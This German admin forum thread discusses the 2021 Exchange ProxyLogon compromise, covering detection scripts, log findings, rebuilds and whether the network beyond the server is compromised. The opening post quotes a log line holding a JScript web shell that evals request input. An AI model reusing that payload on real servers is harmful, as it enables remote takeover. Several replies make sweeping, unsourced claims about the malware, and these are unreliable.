Exchange-Hack (2021-03) war Angriff erfolgreich? Was dann?

Mitglied: FrM222

FrM222 (Level 1) - Jetzt verbinden

08.03.2021 um 12:52 Uhr, 6957 Aufrufe, 95 Kommentare, 4 Danke

Hallo Zusammen,

ich bin ganz neu hier im Forum, daher entschuldige ich mich schon mal im Voraus, falls ich beim Einstellen etwas falsch gemacht habe...

Ich denke jedem Administrator ist momentan die Exchange-Sicherheitslücke ein Begriff.
Wir haben unseren Exchange-Server immer auf einem sehr aktuellen Stand. Das CU19 wurde schon vor Längerem eingespielt und die anderen Updates werden auch sehr regelmäßig installiert.
Heute haben wir das neue Sicherheitsupdate KB5000871 eingespielt.

Aber evtl. war es für den Angriff leider schon zu spät...
Ich habe zur Sicherheit das Prüf-Skript von Microsoft ausgeführt:

https://github.com/microsoft/CSS-Exchange/tree/main/Security

und hierbei wurde leider auch etwas gefunden:
2021-03-08  exchange - Klicke auf das Bild, um es zu vergrößern

In dem entsprechenden Log (ECPServer) habe ich dann mal nach "Set-*VirtualDirectory" gesucht. Auch hier habe ich leider ein Ergebnis bekommen:
"CMD=Set-OabVirtualDirectory.ExternalUrl=''http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Load"],"unsafe");}</script>''.Identity=''be17ebfe-0f37-49e6-93bc-24ec88351326''';S:REQID=;S:URL=/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=kmmtt51qdkO2yxtl4FkaaAj3dhxc4dgI8v36Tka42WAEC0aTVWBpmgyBt8LKKM_B71XVmD7Qlpg.&schema=OABVirtualDirectory;S:REFERRER=;S:EX=;S:ACTID=54323da9-5a3c-4d0a-a383-384298c4334f;S:RS=0;S:BLD=15.1.2176.2;S:TNAME=<null>;S:TID=;S:USID=50d5e26c-f3f1-4d1d-8361-2743b8398f2d;S:EDOID=;S:ACID="

Leider weiß ich nun nicht so recht, was ich damit anfangen soll... gibt es noch irgendeine Möglichkeit dem Angriff entgegenzuwirken und unseren Exchange zu retten?
Wie geht ihr damit um?

Danke für eure Antworten.
95 Antworten
Mitglied: wieoderwas
08.03.2021, aktualisiert um 13:04 Uhr
Ich stehe vor genau dem gleichen Problem.

Wir haben überprüft ab wann die Files angelegt wurden. Bei uns war es der 06.03.2021.
Ich habe den kompletten Server nun vom Netz genommen und nun stelle ich mit unserem Dienstleister gerade das System vom 05.03.2021 her. Dieses dauert nur leider sehr lange... 1,1 TB. Danach werde ich die Datenbank und Logfiles übertragen und versuchen alle noch angriffstellen zu beheben.
Bitte warten ..
Mitglied: aqui
08.03.2021, aktualisiert um 13:05 Uhr
Vielleicht kann man das Microsoft Monokulturen Elend einmal bündeln statt immer wieder individuelle Threads zu dem Thema zu erstellen, denn wir hatten das Thema schon diverse Male:
https://administrator.de/forum/wie-grundsaetzlich-verfahren-mit-exchange ...
Bitte warten ..
Mitglied: Dani
08.03.2021 um 13:07 Uhr
Moin,
Leider weiß ich nun nicht so recht, was ich damit anfangen soll... gibt es noch irgendeine Möglichkeit dem Angriff entgegenzuwirken und unseren Exchange zu retten?



Gruß,
Dani
Bitte warten ..
Mitglied: 147669
147669 (Level 1)
08.03.2021, aktualisiert um 13:14 Uhr
Und zusätzlich zu @Dani's Liste, ein kompromitierter Exchange kann auch ein reale Gefahr für das gesamte AD sein, wenn man dort bspw, Security Best-Practices ala Least-Privilege nicht beachtet wurden dann muss man das gesamte Netzwerk einer eingehenden Analyse unterziehen.
Hatte hier gestern einen Kunden bei dem sind durch die Sicherheitslücken noch weitere Systeme in Mitleidenschaft gezogen worden! Man sollte also vom schlimmsten ausgehen und vorsichtshalber das ganze Netz checken.
Bitte warten ..
Mitglied: NordicMike
08.03.2021, aktualisiert um 13:12 Uhr
Nur, wenn das AD dann schon kompromitiert wurde, hilft das alles nichts...

~~~Edit~~~
Katze war schneller
Bitte warten ..
Mitglied: wieoderwas
08.03.2021 um 13:17 Uhr
Da stellt sich nun aber die Frage wie man das rausbekommen soll bzw. wo soll man nun am AD ansetzen. Die Passwörter haben wir komplett geändert.
Bitte warten ..
Mitglied: 147669
147669 (Level 1)
08.03.2021, aktualisiert um 13:30 Uhr
Zitat von @wieoderwas:
Da stellt sich nun aber die Frage wie man das rausbekommen soll bzw. wo soll man nun am AD ansetzen.
Nun dazu ist man doch Admin oder :-) face-smile? Das steht hoffentlich in deiner Notfall-Doku ;-) face-wink.
Für sowas gibt es auch Intrusion Prevention/Detection Systeme dann bekommt man sowas auch zeitig mit wenn irgendwo was nicht ganz koscher ist.
Zudem sollte ein Internet Facing Exchange (ClientAccess) am besten auch in einer DMZ stehen so kann man besser verhindern das sich dort eingenistete Parasiten nicht so schnell ins interne Netz verbreiten können.
Die Passwörter haben wir komplett geändert.
Wenn das zu spät passiert ist und das Kind schon in den Brunnen gefallen ist hilft das dann auch nicht mehr und schon Shells zu den weiteren infizierten System offen sind. Da hilft dann nur noch Logs checken Offline Tiefenscan der Maschinen und bei dem leisesten Zweifel das/die betroffenen System neu aufsetzen.
Bitte warten ..
Mitglied: FrM222
08.03.2021 um 14:04 Uhr
Wie kann ich feststellen, ab wann genau der Server kompromittiert wurde?
Ist das Datum der gefundenen Logdatei hierfür eine zuverlässige Quelle?
Bitte warten ..
Mitglied: NordicMike
08.03.2021 um 14:16 Uhr
Zudem sollte ein Internet Facing Exchange (ClientAccess) am besten auch in einer DMZ stehen
so kann man besser verhindern das sich dort eingenistete Parasiten nicht so schnell ins interne Netz verbreiten können.
Blöd nur, dass Exchange intensiv mit dem AD verbunden ist, den man im Internen Netzwerk verwendet, bringt also nichts.
Bitte warten ..
Mitglied: Mystery-at-min
08.03.2021 um 14:48 Uhr
Korrekt, mit bissl hingefummeln ist das nicht mehr getan.
Bitte warten ..
Mitglied: NordicMike
08.03.2021, aktualisiert um 15:09 Uhr
Laut Bericht ware bei Exchange 2016 die Version CU18 und CU19 verwundbar. Sie Aussage bringt jedoch nichts, wenn nicht dabei steht, ob CU17,16,15 damit auch verwundbar sind. Genau so könnten sie ebenfalls verwundbar sein und werden in den Reports nicht mehr aufgeführt, da nicht mehr aktuell.

Sind CU17,16,15 nun auch verwundbar?
Bitte warten ..
Mitglied: Mystery-at-min
08.03.2021 um 15:20 Uhr
lt. MS Quellen, ja werden aber nicht aufgeführt.
Bitte warten ..
Mitglied: 147669
147669 (Level 1)
08.03.2021, aktualisiert um 16:17 Uhr
Zitat von @NordicMike:

Zudem sollte ein Internet Facing Exchange (ClientAccess) am besten auch in einer DMZ stehen
so kann man besser verhindern das sich dort eingenistete Parasiten nicht so schnell ins interne Netz verbreiten können.
Blöd nur, dass Exchange intensiv mit dem AD verbunden ist, den man im Internen Netzwerk verwendet, bringt also nichts.
Klar bringt das was, mit entsprechend umgelegten Schaltern lassen sich essentielle Manipulationen aus der DMZ heraus sehr effizient verhindern. Dafür heißt die ja DMZ ;-) face-wink.
Bitte warten ..
Mitglied: NordicMike
08.03.2021 um 16:23 Uhr
DMZ mag ja DMZ sein. Solange Exchange jedoch volle AD Verbindung benötigt, kann er nicht in einer DMZ betrieben werden. Selbst eine getrennt laufende Transport Rolle muss ja die Befehle weiter geben.
Bitte warten ..
Mitglied: nachgefragt
08.03.2021, aktualisiert 09.03.2021
Zitat von @147669:
Hatte hier gestern einen Kunden bei dem sind durch die Sicherheitslücken noch weitere Systeme in Mitleidenschaft gezogen worden! Man sollte also vom schlimmsten ausgehen und vorsichtshalber das ganze Netz checken.
Welche Tools kann man dazu empfehlen?
Bitte warten ..
Mitglied: Mystery-at-min
08.03.2021, aktualisiert um 18:56 Uhr
Zitat von @147669:
Hatte hier gestern einen Kunden bei dem sind durch die Sicherheitslücken noch weitere Systeme in Mitleidenschaft gezogen worden! Man sollte also vom schlimmsten ausgehen und vorsichtshalber das ganze Netz checken.

Wie sah der Aufbau des Netzes aus? Proxy, Firewall? Welche Systeme waren wie betroffen?
Bitte warten ..
Mitglied: D-Line
09.03.2021 um 08:04 Uhr
Ich habe z.B. festgestellt, dass Berechtigungen auf Pfade geändert wurden. Als Beispiel hier:

"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth"

Es wurde vom Benutzer "System" die Leseberechtigung "jeder" gesetzt. Diese Änderung verhindert z.B. die Installation eines CU23 auf Exchange 2013. Und da der Sicherheitspatch von Microsoft nur auf CU23 installiert werden kann, hat man jetzt den Salat...
Bitte warten ..
Mitglied: Fennek11
09.03.2021 um 08:16 Uhr
Die Schwachstelle im "ExChange" gab es wohl schon lange (10 Jahre +) und wurde Microsoft am 2. Januar 2021 gemeldet. In den 2 Monaten bis zum Patch dürften alle Exchange-Server weltweit infiziert worden sein:
ExChage Timeline

Gestern hat John Hammond auf Youtube den Code analysiert.
Bitte warten ..
Mitglied: wieoderwas
09.03.2021 um 11:18 Uhr
Das gleiche Problem hatte
Zitat von @D-Line:

Ich habe z.B. festgestellt, dass Berechtigungen auf Pfade geändert wurden. Als Beispiel hier:

"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth"

Es wurde vom Benutzer "System" die Leseberechtigung "jeder" gesetzt. Diese Änderung verhindert z.B. die Installation eines CU23 auf Exchange 2013. Und da der Sicherheitspatch von Microsoft nur auf CU23 installiert werden kann, hat man jetzt den Salat...

Kann ich bestätigen. Wir konnten uns nur durch eine Neuinstallation des Exchange behelfen.
Bitte warten ..
Mitglied: 147669
147669 (Level 1)
09.03.2021, aktualisiert um 12:08 Uhr
Zitat von @Mystery-at-min:

Zitat von @147669:
Hatte hier gestern einen Kunden bei dem sind durch die Sicherheitslücken noch weitere Systeme in Mitleidenschaft gezogen worden! Man sollte also vom schlimmsten ausgehen und vorsichtshalber das ganze Netz checken.

Wie sah der Aufbau des Netzes aus? Proxy, Firewall? Welche Systeme waren wie betroffen?
  • Segmentiertes flaches Netz mit Server,Client,Device VLANs.
  • Sophos UTM
  • Intrusion Detection (Sophos) hat nicht! angeschlagen.
  • Betroffen waren ein Fileserver und ein weiterer interner IIS Webserver beide auf aktuellem Patchstand Server 2016. Beide wiesen eine gut versteckte Backdoor auf die auch über versteckten DNS Traffic kommunizierte. Bei dem Webserver wurde sogar laut Logs versucht das EFI zu infizieren was aber wohl Dank erweiterter EFI-Protection der Systeme gescheitert ist.
Bitte warten ..
Mitglied: themuck
09.03.2021 um 12:18 Uhr
Zitat von @147669:
  • Betroffen waren ein Fileserver und ein weiterer interner IIS Webserver beide auf aktuellem Patchstand Server 2016. Beide wiesen eine gut versteckte Backdoor auf die auch über versteckten DNS Traffic kommunizierte. Bei dem Webserver wurde sogar laut Logs versucht das EFI zu infizieren was aber wohl Dank erweiterter EFI-Protection der Systeme gescheitert ist.

Wenn das wirklich so gefruchtet hat, dann ist ja auch anzunehmen das alle im Netzwerk befindlichen Geräte betroffen sein könnten. Vom Drucker bis zum Zeiterfassungsterminal was im Netzwerk hängt?
Bitte warten ..
Mitglied: D-Line
09.03.2021 um 12:20 Uhr
Zitat von @wieoderwas:

Das gleiche Problem hatte
Zitat von @D-Line:

Ich habe z.B. festgestellt, dass Berechtigungen auf Pfade geändert wurden. Als Beispiel hier:

"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth"

Es wurde vom Benutzer "System" die Leseberechtigung "jeder" gesetzt. Diese Änderung verhindert z.B. die Installation eines CU23 auf Exchange 2013. Und da der Sicherheitspatch von Microsoft nur auf CU23 installiert werden kann, hat man jetzt den Salat...

Kann ich bestätigen. Wir konnten uns nur durch eine Neuinstallation des Exchange behelfen.


Mittlerweile gibt es ja eine Auflistung von Verzeichnissen und Dateien, welche vom Angriff betroffen sind. (Siehe aktuellsten Meldung im Artikel)

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exc ...

Ich bin mir nicht sicher, ob dies eher statische Verzeichnisse sind. Ansonsten hätte ich mir noch überlegt, ob es eine Möglichkeit wäre, diese Verzeichnisse aus einem Backup wiederherzustellen?
Bitte warten ..
Mitglied: 147669
147669 (Level 1)
09.03.2021, aktualisiert um 12:26 Uhr
Zitat von @themuck:
Wenn das wirklich so gefruchtet hat, dann ist ja auch anzunehmen das alle im Netzwerk befindlichen Geräte betroffen sein könnten. Vom Drucker bis zum Zeiterfassungsterminal was im Netzwerk hängt?
Anzunehmen, die Gefahr besteht bei sowas immer, je nachdem worauf es die abgesehen haben und wie leicht diese Geräte zu übernehmen sind. Einmal im internen Netz steht alles offen sofern keine weiteren Maßnahmen wie Abschottung der Netzsegmente usw. vorhanden sind. Viele kleine Unternehmen halten es eben nicht so mit der Security, denen wird das nun mal praktisch vorgeführt, war wohl mal Zeit. Habe ich ehrlich gesagt immer drauf gewartet das so was mal passiert, vor allem bei den über komplexen Exchange Websites war das nur eine Frage der Zeit.

Ich warte nur noch darauf das die MS Cloud selbst mal davon betroffen ist, dann ist wohl weltweit die Kacke am dampfen.
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 12:22 Uhr
Zitat von @themuck:

Wenn das wirklich so gefruchtet hat, dann ist ja auch anzunehmen das alle im Netzwerk befindlichen Geräte betroffen sein könnten. Vom Drucker bis zum Zeiterfassungsterminal was im Netzwerk hängt?

Davon ist stark auszugehen.
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 12:23 Uhr
Diese Liste dürfte aber ungefähr der Liste der bedrohten Systeme des BSI gleichen - Momentaufnahme ohne Gewähr.
Bitte warten ..
Mitglied: nachgefragt
09.03.2021 um 13:03 Uhr
Dann ist eine Neuinstallation vom Exchange Server nur der Anfang?
Wie geht es dann weiter?
Bitte warten ..
Mitglied: 147669
147669 (Level 1)
09.03.2021, aktualisiert um 13:11 Uhr
Zitat von @nachgefragt:
Wie geht es dann weiter?
Echt jetzt? Diese Frage stellst du am besten am Freitag nochmal ... Wenn man sich so eine Frage stellen muss dann ist der Hopfen nicht mehr weit vom Malz entfernt. Die Vorgehensweise sollte im Normalfall schon in deinem Notfallplan stehen und ist immer individuell auf das Netz zugeschnitten, Malen nach Zahlen gibt es für sowas nicht.
Bitte warten ..
Mitglied: nachgefragt
09.03.2021 um 13:24 Uhr
Zitat von @147669:
Echt jetzt? Diese Frage stellst du am besten am Freitag nochmal ... Wenn man sich so eine Frage stellen muss dann ist der Hopfen nicht mehr weit vom Malz entfernt. Die Vorgehensweise sollte im Normalfall schon in deinem Notfallplan stehen und ist immer individuell auf das Netz zugeschnitten, Malen nach Zahlen gibt es für sowas nicht.
Hab mal im Notfallkonzept geschaut, da stand leider nichts wie man mit diesem neuen Exploit umgehen muss, damit man 100% sicher sein kann das keine weiteren System angepackt wurden.

Laut dir scheint es aber auf diese Frage nur eine einzig richtige Antwort zu geben, so professionell wie du antwortest.

Erleuchte uns.
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 13:45 Uhr
Zitat von @nachgefragt:

Laut dir scheint es aber auf diese Frage nur eine einzig richtige Antwort zu geben, so professionell wie du antwortest.

Erleuchte uns.

IT depends. Notfallplan sollte auch enthalten, wie mit einem Exploit umgegangen wird, je nach dem, wie dieser sich auswirkt, sonst ist er nicht viel wert (was leider oft der Fall ist).
Bitte warten ..
Mitglied: nachgefragt
09.03.2021, aktualisiert um 16:05 Uhr
... auch da bin ich offen für neue Lösungsansätze. Klar kann ich alle Bänder rausholen und alles auf Stand der vorletzten Kalenderwoche hochfahren,... .

Ist halt schon schwer wenn man nicht abschätzen kann was dahintersteckt und das Gefahrenpotential beurteilen kann.
Soll ich die Firma nun mehrere Tage stilllegen welche ich gerade von Corona erholt oder gibt es andere Wege?
Biontec oder Astrazeneca, sicherlich nimmt der ein oder ander einfach beides ¯\_(ツ)_/¯

Nunja, ein Forum ist halt kostenlos ¯\_(ツ)_/¯ hätt ich fast vergessen.

Ich lese dann einfach hier mit, bringt mich dann doch weiter: https://administrator.de/forum/exchange-zero-day-hack-wie-entfernen-6603 ...

EDIT
Lösung aus dem o.g. Link half auch in meinem Fall
unbenannt - Klicke auf das Bild, um es zu vergrößern
  • Änderung aller Nutzerkennwörter

Bitte warten ..
Mitglied: 147669
147669 (Level 1)
09.03.2021, aktualisiert um 17:32 Uhr
* Microsoft Safety Scanner laden und auf dem Exchange Server ausführen
  • Änderung aller Nutzerkennwörter
Was machst du aber wenn das Kind schon in den Brunnen gefallen ist und weitere Systeme durch die Lücke befallen wurden? Damit platzt dann die Bombe, ist nur eine Frage der Zeit wann es auffällt.
Wie oben schon erwähnt ist bei einem Kunden genau das passiert. Neben dem EX wurden ein Fileserver und ein weiterer IIS Webserver im Netz befallen. Ausbruch mittels PassTheHash und Golden Ticket weil man sich eben dachte mit zu privilegierten Accounts (Domain Admin) auf dem EX arbeiten zu müssen.
Die üblichen Scanner haben übrigens die dort gefundene Backdoor übrigens nicht identifizieren können, das ist nur aufgefallen weil unüblich viele inplausible DNS Anfragen getarnt über einen Windows eigenen Dienst abgesetzt wurden.
Wenn man also reparieren will ohne neu aufzusetzen ist also nicht nur Klicki-Bunti gefragt sondern auch der Verstand, aber selbst dann bist du noch nicht 100% sicher das du auch alles gefunden hast! Deswegen ist das "ausbessern" so gefährlich.

Ein verantwortungsvoller Admin prüft also beim leistesten Verdacht das gesamte Netz, auch wenn dabei mehr Zeit drauf geht. Man hat ja heute jede Menge Möglichkeiten diese Arbeiten auch zum Großteil zu automatisieren.
Bitte warten ..
Mitglied: dertowa
09.03.2021 um 17:32 Uhr
Zitat von @Fennek11:

Die Schwachstelle im "ExChange" gab es wohl schon lange (10 Jahre +) und wurde Microsoft am 2. Januar 2021 gemeldet. In den 2 Monaten bis zum Patch dürften alle Exchange-Server weltweit infiziert worden sein:
ExChage Timeline

Gestern hat John Hammond auf Youtube den Code analysiert.

Ich hätte nicht gedacht, dass ich mal relativ froh sein werde einen Exchange Online zu nutzen.
Denn soweit ich bisher gelesen habe ist dieser nicht betroffen, bzw. soweit aus meinem Zugriff, dass Microsoft diese Server selbst prüfen und bereinigen muss.

Das ist alles total verrückt.
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 17:32 Uhr
absolut und nur so.
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 17:34 Uhr
oder deine Daten wurden komprimiert über Weltweit bestens angebundene Netze bereits extrahiert und wurden als erste bereits analysiert...wer weiss das schon...
Bitte warten ..
Mitglied: nachgefragt
09.03.2021 um 18:03 Uhr
Zitat von @147669:
Ein verantwortungsvoller Admin prüft also beim leistesten Verdacht das gesamte Netz, auch wenn dabei mehr Zeit drauf geht. Man hat ja heute jede Menge Möglichkeiten diese Arbeiten auch zum Großteil zu automatisieren.
Na wenn du jetzt noch konkrete Vorschläge dazu bringst ohne das man es dir aus der Nase ziehen muss könnte ich fast annehmen, dass du es sogar beruflich machst und forenkollegial einen nützlichen Beitrag lieferst.

Unterschiedliche IT-Dienstleister voller "Experten mit jahrelanger Berufserfahrung und was-es-nicht-alles-gibt-Zerfifizierungen" bringen derart gegensätzliche Vorschläge... wäre ja nicht so als hätten wir noch schon das x-te "Supertool" im trial gehabt.

Schönen Feierabend!
Bitte warten ..
Mitglied: 147669
147669 (Level 1)
09.03.2021, aktualisiert um 18:10 Uhr
Zitat von @nachgefragt:
Na wenn du jetzt noch konkrete Vorschläge dazu bringst ohne das man es dir aus der Nase ziehen muss könnte ich fast annehmen, dass du es sogar beruflich machst und forenkollegial einen nützlichen Beitrag lieferst.
Was erwartest du hier? Sollen wir dir hier jetzt im kleinsten die Grundlagen eines Netzwerk-Admins beibringen?? Du erwartest etwas was in diesem Rahmen einfach nicht leistbar ist außer du bezahlst uns die Zeit für eine Schulung.
Malware Entfernung und Analyse lernt man eben nicht durch Foren-Threads sondern mit der Zeit und vor allem Praxis, da bringen einem auch Zertifizierungen wenig bis nichts. Außerdem ist jedes Netz anders und erfordert andere Vorgehensweisen!

Schönen Feierabend!
Dito.
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 18:10 Uhr
Unterschiedliche IT-Dienstleister voller "Experten mit jahrelanger Berufserfahrung und was-es-nicht-alles-gibt-Zerfifizierungen" bringen derart gegensätzliche Vorschläge... wäre ja nicht so als hätten wir noch schon das x-te "Supertool" im trial gehabt.

Welche gegensätzlichen Vorschläge? Alle Vorschläge laufen auf Wachsamkeit hinaus. Das muss man entweder durch Zeit- oder Münzeinwurf erkaufen.

Wenn das schon erfolgt ist, fragen sich sicherlich einige, wo das der Fall war und was das Ergebnis war - oder ob es zu wenig Münzen waren. Ansonsten ist das Gebettel um konkrete Aussagen in einer Angriffswelle, die noch akut ist (die wahren Schäden werden sich sicher erst noch zeigen - insbesondere bei den jetzt nicht frühzeitig isolierten Systemen), fast schon peinlich.

Malware Entfernung und Analyse lernt man eben nicht durch Foren-Threads sondern mit der Zeit und Praxis. Außerdem ist jedes Netz anders und erfordert andere Vorgehensweisen!

so ist es, außer das Netz wurde nach selbem Plan aufgebaut, was unwahrscheinlich ist.

Schönen Feierabend!

ebenfalls
Bitte warten ..
Mitglied: dertowa
09.03.2021 um 18:17 Uhr
Soweit klar, aber die Hintergrundsorgen über ein kompromitiertes AD und Clients ist dadurch deutlich geringer...?
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 18:21 Uhr
Zitat von @dertowa:

Soweit klar, aber die Hintergrundsorgen über ein kompromitiertes AD und Clients ist dadurch deutlich geringer...?

Je nach dem, wie man es in den Kontext bringt. Wenn dein einziger Datenbestand der Exchange ist - dann bist du genau so angeratzt, wie wenn dein Fileserver abgegriffen wurde - hier könnte die eher schlechte Internetanbindung in Deutschland Vorteile bringen, da die Daten langsamer fliessen. Aber ob das wirklich der Weisheit letzter Schluss ist, klar, vor und Nachteile. Man muss sich um nichts kümmern.
Bitte warten ..
Mitglied: dertowa
09.03.2021 um 18:32 Uhr
... oder anders gesagt man kann in dem Szenario nichts anderes unternehmen als den Glauben an den großen Micro zu stärken. :D
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 18:36 Uhr
Zitat von @dertowa:

... oder anders gesagt man kann in dem Szenario nichts anderes unternehmen als den Glauben an den großen Micro zu stärken. :D

...oder Ihn komplett verlieren. Schaut euch mal das Datum des Patches in den Eigenschaften an...wenn's auf der anderen Seite grüner wär...
Bitte warten ..
Mitglied: dertowa
09.03.2021 um 18:41 Uhr
Wann war er denn fertig?
Ggf. hat man ja auch erstmal die Exchange Online als Testumgebung aktualisiert. :P
... man kann sich das Cloud zeug auch schöndenken.
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 18:55 Uhr
Schau Mal rein 2kw Februar.
Bitte warten ..
Mitglied: wieoderwas
09.03.2021, aktualisiert um 21:09 Uhr
Unser Exchangeserver 2013 war befallen.

Ich habe den Exchangeserver sofort vom Netzgenommen und alle Firewallregeln auf deaktiviert gesetzt.

Danach haben wir einen komplett neuen Exchangeserver aufgesetzt und die alte Datenbank angehangen.
Dann habe wir alle zur Verfügung stehen Patches / Updates eingespielt. Im Anschluss dessen habe ich nur die Port für den Mailverkehr (POP3, SMTP) wieder aktiviert.

Der MSERT Scanner zeigt nichts mehr an und ich konnte auch keine der dobiosen Files mehr in den bekannten Pfaden finden. Allerdings schlägt das Test-ProxyLogon.Ps1 Script an und es wurde wieder was verdächtiges (Suspicious activity found) angezeigt.

Ports auf der Firewall sind geschlossen, Server ist komplett frisch installiert und das Update + Patch ist ebenfalls eingespielt.

Könnte es mit der Installation von Kaspersky for Exchange zu tun haben?
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 21:18 Uhr
Was genau zeigt er an?
Bitte warten ..
Mitglied: wieoderwas
09.03.2021, aktualisiert um 22:12 Uhr

Bitte warten ..
Mitglied: Coreknabe
09.03.2021 um 21:38 Uhr
Hi,

habe heute noch das hier ausprobiert, macht nen ganz guten Eindruck bei der Log-Analyse, inkl. vorgefertigter Suchfunktionen:
https://www.spectx.com/articles/analyzing-iis-logs

Gruß
Bitte warten ..
Mitglied: Mystery-at-min
09.03.2021 um 21:39 Uhr
sieht ungut aus, nach der Reparatur?
Bitte warten ..
Mitglied: wieoderwas
09.03.2021, aktualisiert um 22:13 Uhr
Zitat von @Mystery-at-min:

sieht ungut aus, nach der Reparatur?

keine Reparatur. Der Server ist komplett neu aufgesetzt und alle Sicherheitsupdates + Patches sind eingespielt.

Erst danach wurde die Verbindung für SMTP und Pop3 wieder aktiviert.
Aus diesem Grund kann ich mir eigentlich nur vorstellen das dieses Fehlinfomationen sind.

Habe auf jeden Fall in diesen Ordnern nichts vergleichbares gefunden.

The web shells we detected had the following file names:

Bitte warten ..
Mitglied: nachgefragt
10.03.2021 um 12:29 Uhr
Zitat von @Mystery-at-min:
Welche gegensätzlichen Vorschläge? Alle Vorschläge laufen auf Wachsamkeit hinaus.
Ich denke auch wir wenden uns an große namenhafte IT-Dienstleister, sichern und doppelt ab und stellen regelmäßig in Frage. Und auch diese "durchzertifizierten Experten" müssen sich nun zum Großteil an den Pranger stellen (sollten, müssen), es sind wohl knapp 30.000 Exchange Server in Deutschland betroffen.
https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2021/202 ...
Bitte warten ..
Mitglied: wieoderwas
10.03.2021 um 12:40 Uhr
Kann ich eigentliche die erstellten Log Files irgendwie prüfen lassen bzw. den Inhalt? Ich kann und will es einfach nicht wahr haben das ein komplett neu eingerichteter Exchange mit geschlossenen Ports und allen Updates erneut befallen ist...
Bitte warten ..
Mitglied: IT-Spezi
10.03.2021, aktualisiert um 12:47 Uhr
Zitat von @wieoderwas:

keine Reparatur. Der Server ist komplett neu aufgesetzt und alle Sicherheitsupdates + Patches sind eingespielt.

Erst danach wurde die Verbindung für SMTP und Pop3 wieder aktiviert.
Aus diesem Grund kann ich mir eigentlich nur vorstellen das dieses Fehlinfomationen sind.

Wieso glaubst Du, das reicht?
Das Ding ist böse, richtig böse. Es tarnt sich über vier Ebenen vor Virenscannern (mit einigen echt schmutzigen Tricks). Erst in der 5. Ebene wird der richtig aktiv. Der Exchange ist nur das Einfallstor. Von dort aus werden zuerst neue Rechte (lokal und im AD), zeitgesteurte Aufgaben (alle 45 Min wird nach Hause telefoniert) und ein Dienst gesetzt. Es wird das gesammte AD gescannt und je nach verwendeten Client (32- oder 64-Bit) weitere dlls nachgeladen die bis zu 54 Angriffstechniken die anderen Kisten im AD angegriffen. (Der Programmierer ist ein "Katzenliebhaber".) Natürlich werden Cryptos vorinstalliert und noch ein paar Backdoors eingebaut.

Geh also davon aus, das Du den neuinstallieren Exchange in eine "freindliche Umgebung" ausgesetzt hast und der sofort wieder infiziert wurde. Bei diesem fiesen Ding muss man sich um das ganze Netzwerk kümmern, nicht nur um den Exchange.

Gruß

its
Bitte warten ..
Mitglied: wieoderwas
10.03.2021, aktualisiert um 12:49 Uhr
Das ist mir schon bewusst. Ich scanne gefühlt jede Minute alle Server und Clients...
Aber auf den anderen Systemen ist bis jetzt nichts verdächtiges zu sehen.

Bisher scanner ich nur mit Kaspersky MSET und dem Script. Nutzt ihr noch andere Tools?
Bitte warten ..
Mitglied: IT-Spezi
10.03.2021, aktualisiert 11.03.2021
Zitat von @wieoderwas:

Das ist mir schon bewusst. Ich scanne gefühlt jede Minute alle Server und Clients...
Aber auf den anderen Systemen ist bis jetzt nichts verdächtiges zu sehen.

Bisher scanner ich nur mit Kaspersky MSET und dem Script. Nutzt ihr noch andere Tools?
Das wichtigste Tool sitzt ca. 60cm vor dem Bildschirm.
Die Tools von Microsoft, Kaspersky und Co. geben erste Anhaltspunkte. Da der Programmierer hier über mehr als vier Ebenen mit Base64 encodiert, greifen die automatischen Schutzmaßnahmen oft nicht. Wie schon oben von den Kollegen beschrieben gibt es auch Listen mit den genutzten Verzeichnissen. Leider kann sich der Code während einer Angriffswelle natürlich auch verändern und somit die Namen.
Zeitgesteurte Prozesse kannst Du z.B. mit "TaskSchedulerView" sichtbar machen.
Wenn Du da "Winnet" findest, dann ist das ein ganz schlechtes Zeichen.

Gruß

its
Bitte warten ..
Mitglied: Coreknabe
10.03.2021 um 13:35 Uhr
Kann ich eigentliche die erstellten Log Files irgendwie prüfen lassen bzw. den Inhalt? Ich kann und will es einfach nicht wahr haben das ein komplett neu eingerichteter Exchange mit geschlossenen Ports und allen Updates erneut befallen ist...

@wieoderwas
Schau Dir mal mein Posting oben wegen SpectX an, da gibt es Templates, die entsprechende Logs testen. Für meine Zwecke hat die kostenlose Version ausgereicht.

Gruß
Bitte warten ..
Mitglied: GeorgBohn
11.03.2021, aktualisiert um 01:56 Uhr
Ich pflege "nur" 2 Exchange Systeme, die allerdings mit >100 Usern

Bei beiden ergibt Test-ProxyLogon.ps1, dass schmutzige Zugriffe versucht wurden.
Bei beiden gibt es aber keinerlei Hinweise im Dateisystem (aspx etc in den entsprechenden Ordnern)

Ich vermute mal ganz verwegen, dass die Deaktivierung des Zugriffs auf ecp über Internet,


welche ich bei Installation gesetzt habe, mich bzw meine Kunden gerettet hat.


Blauäugig oder nachvollziehbar?
Bitte warten ..
Mitglied: KITSER
11.03.2021, aktualisiert um 03:09 Uhr
An die Frage schließe ich mich an.

Bei den von mir betreuten Servern ergibt Test-ProxyLogon.ps1 auch Versuche.
Den Patch habe ich in der Nacht von Sonntag auf Montag eingespielt.
Ereignis Log, intensive manuelle Suche, mehrfacher Durchlauf des MSERT auf allen Servern der Domäne, DNS und AD ergaben nichts auffälliges.

Ein sehr ungutes Gefühl bleibt aber trotzdem....
Bitte warten ..
Mitglied: nachgefragt
11.03.2021, aktualisiert um 07:34 Uhr
Zitat von @147669:
verantwortungsvoller Admin
Der Hafnium Exchange-Server-Hack: Anatomie einer Katastrophe

Jetzt kannst du uns alle erleuchten Dr. Best; bisher muss ich annehmen, deinerseits beruflicher Praxis max. 1%

